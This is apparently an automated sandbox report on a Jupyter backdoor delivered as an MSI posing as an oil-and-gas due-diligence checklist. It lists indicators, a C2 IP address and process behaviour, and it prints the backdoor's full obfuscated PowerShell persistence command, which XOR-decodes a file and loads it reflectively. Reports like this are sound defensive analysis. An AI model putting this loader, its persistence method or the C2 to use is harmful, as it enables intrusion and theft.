Analysis
-
max time kernel
64s -
max time network
128s -
platform
windows10_x64 -
resource
win10v20210408 -
submitted
16-09-2021 08:31
Static task
static1
Behavioral task
behavioral1
Sample
Due-Diligence-Checklist-For-Oil-And-Gas-Properties.msi
Resource
win7-en
windows7_x64
0 signatures
0 seconds
General
Malware Config
Extracted
Family
jupyter
Version
SP-13
C2
http://45.42.201.248
Signatures
-
Jupyter Backdoor/Client Payload 1 IoCs
resource yara_rule behavioral2/memory/1280-1911-0x00000000096A0000-0x00000000096A8000-memory.dmp family_jupyter -
Blocklisted process makes network request 3 IoCs
flow pid Process 6 1832 msiexec.exe 8 1832 msiexec.exe 9 1280 powershell.exe -
Executes dropped EXE 1 IoCs
pid Process 1408 MSI502A.tmp -
Drops startup file 1 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\MICROSofT\wINdOwS\staRt MEnU\PROgRaMs\staRTup\abfe9e9acdd4c183ad426abc88479.lnK powershell.exe -
Loads dropped DLL 2 IoCs
pid Process 920 MsiExec.exe 920 MsiExec.exe -
Enumerates connected drives 3 TTPs 48 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\F: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\F: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\Y: msiexec.exe -
Checks processor information in registry 2 TTPs 4 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor MSI502A.tmp Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\ProcessorNameString MSI502A.tmp Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 MSI502A.tmp Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString MSI502A.tmp -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily MSI502A.tmp Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemVersion MSI502A.tmp Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS MSI502A.tmp -
Modifies registry class 7 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\mlsquesojuhywrl\shell\open\command\ = "PowersHElL -wINDOwStYLe HIdDEn -ep BypASS -coMMaNd \"$ae898dcfc24431a74b3c1ba635282='QHJSKEleT2wzWUB9cmk4QHJIfThAVTVQIUB3MWJmQFJnXm9AfThgd0B7XiNlQHx1dlFAc15VM0ByOSthXlFFPThAe0BzKEB1PDY+QH5GUzRAcT4lSUB0ZFRVQHd1YkReUzZlRF5QK15UXjFaZFRAfGM7MF5NYW5mQDFlUXl0RmV5XlFmaGNAVj1zeDwtV0deek9rZTZ1KHFWQHpNUylzblh2SkptNygmUGsmVz1WbXlZcU9rQ083VHdYWEEmZ3JELWhocFk=';$a84b042eeeb4a4a8a2216c8f5b3aa=[SySTem.io.file]::READAllBytES('C:\\Users\\Admin\\AppData\\Roaming\\MiCrOsoFt\\UNpFKteogOCmxA\\AtNbGjDTsZyadeKgW.yweDfhMRVGQt');foR($ad6c4e2f3ef4f0a84c8f0bdcc186c=0;$ad6c4e2f3ef4f0a84c8f0bdcc186c -LT $a84b042eeeb4a4a8a2216c8f5b3aa.CounT;){FOR($abc7feb99fa43dba4479c37e0a07a=0;$abc7feb99fa43dba4479c37e0a07a -lt $ae898dcfc24431a74b3c1ba635282.lENgth;$abc7feb99fa43dba4479c37e0a07a++){$a84b042eeeb4a4a8a2216c8f5b3aa[$ad6c4e2f3ef4f0a84c8f0bdcc186c]=$a84b042eeeb4a4a8a2216c8f5b3aa[$ad6c4e2f3ef4f0a84c8f0bdcc186c] -bXOr $ae898dcfc24431a74b3c1ba635282[$abc7feb99fa43dba4479c37e0a07a];$ad6c4e2f3ef4f0a84c8f0bdcc186c++;iF($ad6c4e2f3ef4f0a84c8f0bdcc186c -gE $a84b042eeeb4a4a8a2216c8f5b3aa.COuNT){$abc7feb99fa43dba4479c37e0a07a=$ae898dcfc24431a74b3c1ba635282.leNgTh}}};[SYstEm.REfleCTiOn.aSSembLY]::LoaD($a84b042eeeb4a4a8a2216c8f5b3aa);[MArS.DeImos]::iNtErAct()\"" powershell.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\.sqelcvlfmtwnomrscuh powershell.exe Set value (str) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\.sqelcvlfmtwnomrscuh\ = "mlsquesojuhywrl" powershell.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\mlsquesojuhywrl\shell\open\command powershell.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\mlsquesojuhywrl powershell.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\mlsquesojuhywrl\shell powershell.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\mlsquesojuhywrl\shell\open powershell.exe -
Suspicious behavior: EnumeratesProcesses 3 IoCs
pid Process 1280 powershell.exe 1280 powershell.exe 1280 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeShutdownPrivilege 1832 msiexec.exe Token: SeIncreaseQuotaPrivilege 1832 msiexec.exe Token: SeSecurityPrivilege 2280 msiexec.exe Token: SeCreateTokenPrivilege 1832 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 1832 msiexec.exe Token: SeLockMemoryPrivilege 1832 msiexec.exe Token: SeIncreaseQuotaPrivilege 1832 msiexec.exe Token: SeMachineAccountPrivilege 1832 msiexec.exe Token: SeTcbPrivilege 1832 msiexec.exe Token: SeSecurityPrivilege 1832 msiexec.exe Token: SeTakeOwnershipPrivilege 1832 msiexec.exe Token: SeLoadDriverPrivilege 1832 msiexec.exe Token: SeSystemProfilePrivilege 1832 msiexec.exe Token: SeSystemtimePrivilege 1832 msiexec.exe Token: SeProfSingleProcessPrivilege 1832 msiexec.exe Token: SeIncBasePriorityPrivilege 1832 msiexec.exe Token: SeCreatePagefilePrivilege 1832 msiexec.exe Token: SeCreatePermanentPrivilege 1832 msiexec.exe Token: SeBackupPrivilege 1832 msiexec.exe Token: SeRestorePrivilege 1832 msiexec.exe Token: SeShutdownPrivilege 1832 msiexec.exe Token: SeDebugPrivilege 1832 msiexec.exe Token: SeAuditPrivilege 1832 msiexec.exe Token: SeSystemEnvironmentPrivilege 1832 msiexec.exe Token: SeChangeNotifyPrivilege 1832 msiexec.exe Token: SeRemoteShutdownPrivilege 1832 msiexec.exe Token: SeUndockPrivilege 1832 msiexec.exe Token: SeSyncAgentPrivilege 1832 msiexec.exe Token: SeEnableDelegationPrivilege 1832 msiexec.exe Token: SeManageVolumePrivilege 1832 msiexec.exe Token: SeImpersonatePrivilege 1832 msiexec.exe Token: SeCreateGlobalPrivilege 1832 msiexec.exe Token: SeCreateTokenPrivilege 1832 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 1832 msiexec.exe Token: SeLockMemoryPrivilege 1832 msiexec.exe Token: SeIncreaseQuotaPrivilege 1832 msiexec.exe Token: SeMachineAccountPrivilege 1832 msiexec.exe Token: SeTcbPrivilege 1832 msiexec.exe Token: SeSecurityPrivilege 1832 msiexec.exe Token: SeTakeOwnershipPrivilege 1832 msiexec.exe Token: SeLoadDriverPrivilege 1832 msiexec.exe Token: SeSystemProfilePrivilege 1832 msiexec.exe Token: SeSystemtimePrivilege 1832 msiexec.exe Token: SeProfSingleProcessPrivilege 1832 msiexec.exe Token: SeIncBasePriorityPrivilege 1832 msiexec.exe Token: SeCreatePagefilePrivilege 1832 msiexec.exe Token: SeCreatePermanentPrivilege 1832 msiexec.exe Token: SeBackupPrivilege 1832 msiexec.exe Token: SeRestorePrivilege 1832 msiexec.exe Token: SeShutdownPrivilege 1832 msiexec.exe Token: SeDebugPrivilege 1832 msiexec.exe Token: SeAuditPrivilege 1832 msiexec.exe Token: SeSystemEnvironmentPrivilege 1832 msiexec.exe Token: SeChangeNotifyPrivilege 1832 msiexec.exe Token: SeRemoteShutdownPrivilege 1832 msiexec.exe Token: SeUndockPrivilege 1832 msiexec.exe Token: SeSyncAgentPrivilege 1832 msiexec.exe Token: SeEnableDelegationPrivilege 1832 msiexec.exe Token: SeManageVolumePrivilege 1832 msiexec.exe Token: SeImpersonatePrivilege 1832 msiexec.exe Token: SeCreateGlobalPrivilege 1832 msiexec.exe Token: SeCreateTokenPrivilege 1832 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 1832 msiexec.exe Token: SeLockMemoryPrivilege 1832 msiexec.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 1832 msiexec.exe -
Suspicious use of WriteProcessMemory 8 IoCs
description pid Process procid_target PID 2280 wrote to memory of 920 2280 msiexec.exe 70 PID 2280 wrote to memory of 920 2280 msiexec.exe 70 PID 2280 wrote to memory of 920 2280 msiexec.exe 70 PID 920 wrote to memory of 1280 920 MsiExec.exe 71 PID 920 wrote to memory of 1280 920 MsiExec.exe 71 PID 920 wrote to memory of 1280 920 MsiExec.exe 71 PID 1832 wrote to memory of 1408 1832 msiexec.exe 73 PID 1832 wrote to memory of 1408 1832 msiexec.exe 73
Processes
-
C:\Windows\system32\msiexec.exemsiexec.exe /I C:\Users\Admin\AppData\Local\Temp\Due-Diligence-Checklist-For-Oil-And-Gas-Properties.msi1⤵
- Blocklisted process makes network request
- Enumerates connected drives
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:1832 -
C:\Users\Admin\AppData\Local\Temp\MSI502A.tmp"C:\Users\Admin\AppData\Local\Temp\MSI502A.tmp"2⤵
- Executes dropped EXE
- Checks processor information in registry
- Enumerates system info in registry
PID:1408
-
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Enumerates connected drives
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2280 -
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding E3DA67FD23A1075CF4C32F37B6E2D57C C2⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:920 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe-NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\pss50B9.ps1" -propFile "C:\Users\Admin\AppData\Local\Temp\msi5096.txt" -scriptFile "C:\Users\Admin\AppData\Local\Temp\scr5097.ps1" -scriptArgsFile "C:\Users\Admin\AppData\Local\Temp\scr50A8.txt" -propSep " :<->: " -testPrefix "_testValue."3⤵
- Blocklisted process makes network request
- Drops startup file
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
PID:1280
-
-